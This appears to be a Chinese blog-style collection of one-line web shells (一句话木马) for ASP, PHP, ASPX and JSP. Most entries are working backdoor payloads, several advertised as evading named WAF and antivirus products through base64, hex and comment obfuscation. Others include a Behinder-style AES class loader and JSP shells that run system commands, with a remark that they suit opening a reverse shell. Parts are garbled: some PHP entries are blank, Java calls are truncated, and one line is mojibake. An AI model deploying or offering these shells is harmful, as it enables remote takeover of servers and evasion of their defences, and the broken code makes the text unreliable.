2023年7月14日发(作者：)

PHP、asp、aspx、JSP⼀句话1、asp⼀句话⽊马：<%eval request(“x”)%>2、php⼀句话⽊马：3、aspx⼀句话：<%@ Page Language=”Jscript”%><%eval(["x"],”unsafe”);%>4、数据库加密⼀句话(密码a)：┼攠数畣整爠焕敌瑳∨≡┩忾5、⽹站配置、版权信息专⽤⼀句话：”%><%Eval Request(x)%>6、⼀句话再过护卫神：<%Y=request(“x”)%> <%execute(Y)%>7、过拦截⼀句话⽊马：<% eXEcGlOBaL ReQuEsT(“x”) %>8、asp闭合型⼀句话:%><%eval request(“0o1Znz1ow”)%><%9、能过安全狗的解析格式：;hfdjf.;dfd.;;

10、突破安全狗的⼀句话：<%Y=request(“x”)%> <%eval(Y)%>11、elong过安全狗的php⼀句话：12、突破护卫神，保护盾⼀句话：13、⾼强度php⼀句话：

14、后台常⽤写⼊php⼀句话（密码x）：rn”);@fclose($fp);>

15、许多⽹页程序都不允许包含〈%%〉标记符号的内容的⽂件上传，这样⼀句话⽊马就写⼊不进数据库了。‘ E& Y; Y1 R$ s# ]. L$ c改成：〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script这样就避开了使⽤〈%%〉，保存为.ASP,程序照样执⾏的效果是⼀样的

16、PHP⾼强度⼀句话： 菜⼑连接：/?x=lostwolf 脚本类型：php 密码：c 菜⼑连接 躲避检测 密码：c

17、突破安全狗的aspx的⼀句话：<%@ Page Language=”C#” ValidateRequest=”false” %><%try{ (Read((s["你的密码"].Value))).CreateInstance(“c”, true,t, null, new object[] { this }, null, null); } catch { }%>

18、php变异⼀句话：

19、绕阿⾥云冰蝎php<%@page import=".*,.*,.*"%><%!class U extendu0073 ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){Class(b,0,);}}%><%if(ameter("pass")!=null){String k=(""+UUID()).replace("-","").substring(16);ue("u",k);(k);return;}Cipher c=tance("AES");(2,newSecretKeySpec((ue("u")+"").getBytes(),"AES"));new U(ss().getClassLoader()).g(l(64Decoder().decodeBuffer(der().readLine()))).newInstance().equals(pageContext);%>

20、JSP⼀句话收集<%if(ameter("f")!=null)(new tputStream(lPath("")+ameter("f"))).write(ameter("t").getBytes());%>在浏览器地址栏输⼊127.0.0.1:8080/?f=&t=hello world然后再输⼊127.0.0.1:8080/test/

21、jsp⽆回显执⾏系统命令：<%time().exec(ameter("i"));%>请求：127.0.0.1:8080/Shell/?i=ls执⾏之后不会有任何回显，⽤来反弹个shell很⽅便。

22、jsp有回显带密码验证的:<%if("023".equals(ameter("pwd"))){tream in = time().exec(ameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];("

");while((a=(b))!=-1){n(new String(b));}("

");}%>请求：192.168.16.240:8080/Shell/?pwd=023&i=ls

23、JSP<%@ page contentType="text/html;charset=big5" session="false" import=".*" %><%Runtime runtime = time();Process process =null;String line=null;InputStream is =null;InputStreamReader isr=null;BufferedReader br =null;String ip=ameter("cmd");try{process =(ip);is = utStream();isr=new InputStreamReader(is);br =new BufferedReader(isr);n("

");while( (line = ne()) != null ){n(line);();}n("

");();();();}catch(IOException e ){n(e);(1);}%>24、aspx⽊马收集：

<%@ Page Language="Jscript"%><%eval(["chopper"],"unsafe");%>随⽇期变化的连接密码, 服务端写法：<%@ Page Language="Jscript"%><%eval([sswordForStoringInConfigFile(("{0:yyyyMMdd}",ersalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>例如：菜⼑的密码为chopper，在前⾯加三个字符,新密码为：{D}chopper<%@ Page Language="Jscript" validateRequest="false" %><%(eval(["w"],"unsafe"));%>

<%popup(popup(oding(65001).GetString(se64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));%>密码 z

<%@ Page Language="Jscript" validateRequest="false" %><%var keng keng = ["never"];(eval(keng,"unsafe"));%>

<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>密码 -7

<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["x61x62x63x64"];eval(PAY,"x75x6Ex73x61"+"x66x65");%>密码 abcd

<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["x61x62x63x64"];eval(PAY,"x75x6Ex73x61"+"x66x65");%>

过狗过D盾⼀句话

<%@ Page Language="Jscript" Debug=true%><%var a=oding(65001).GetString(se64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));var b=oding(65001).GetString(se64String("dW5zYWZl"));var c=eval(a,b);eval(c,b);%>

<%@ Page Language="Jscript" Debug=true%><%var a=["pass"];var b="unsa",c="fe",d=b+c;function fun(){return a;}eval(fun(),d);%>

个⼈收集的部分⼀句话，仅供参考，不要拿去⼲坏事哦。